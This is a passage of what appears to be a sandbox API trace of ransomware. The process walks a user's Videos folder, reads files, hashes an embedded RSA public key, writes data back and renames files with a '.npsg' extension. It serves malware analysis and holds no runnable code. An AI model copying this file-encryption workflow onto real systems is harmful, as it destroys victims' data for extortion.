(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0240.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.843] GetCurrentThreadId () returned 0x5b4 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b89e08 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.844] GetCurrentThreadId () returned 0x5b4 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f70 [0240.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0240.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f28 [0240.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ef8 [0240.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0240.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f88 [0240.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f58 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fa0 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f40 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f10 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0240.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0240.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f10 | out: hHeap=0x620000) returned 1 [0240.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0240.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a3b8 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f88 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ef8 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88ee0 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f928 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0240.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.849] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x64ca, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x64ca, lpOverlapped=0x0) returned 1 [0240.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0240.849] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x64cf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.849] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0240.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0240.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0240.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0240.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa10 [0240.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0240.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0240.850] WriteFile (in: hFile=0x644, lpBuffer=0x346fa10*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa10*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0240.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.850] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.850] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.850] CloseHandle (hObject=0x644) returned 1 [0240.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0240.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b8bcd0 [0240.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0240.851] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BaZuioftz9c.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\bazuioftz9c.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BaZuioftz9c.swf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\bazuioftz9c.swf.npsg")) returned 1 [0240.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0240.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.852] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0240.854] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3e52c0, ftCreationTime.dwHighDateTime=0x1d5c3d9, ftLastAccessTime.dwLowDateTime=0x2a215cf0, ftLastAccessTime.dwHighDateTime=0x1d5bd5f, ftLastWriteTime.dwLowDateTime=0x2a215cf0, ftLastWriteTime.dwHighDateTime=0x1d5bd5f, nFileSizeHigh=0x0, nFileSizeLow=0x16ddf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCU1g3YN.mkv", cAlternateFileName="")) returned 1 [0240.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d910 [0240.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x33b8188 [0240.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d910 | out: hHeap=0x620000) returned 1 [0240.854] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BCU1g3YN.mkv") returned=".mkv" [0240.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\BCU1g3YN.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\bcu1g3yn.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.855] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=93663) returned 1 [0240.855] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.880] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x16db9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.880] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.882] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0240.882] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x16ddf, lpOverlapped=0x0) returned 1 [0240.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0240.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.883] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.883] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.884] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.884] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.884] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0240.885] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.885] GetLastError () returned 0x0 [0240.885] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.885] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.885] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.885] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.885] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0240.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16de0) returned 0x3b95d50 [0240.886] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0240.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f928 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ee0 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f970 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88ef8 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f28 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f88 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0240.887] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f28 | out: hHeap=0x620000) returned 1 [0240.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f88 | out: hHeap=0x620000) returned 1 [0240.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0240.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.887] RtlAllocateHeap (HeapHandle=0x620000, 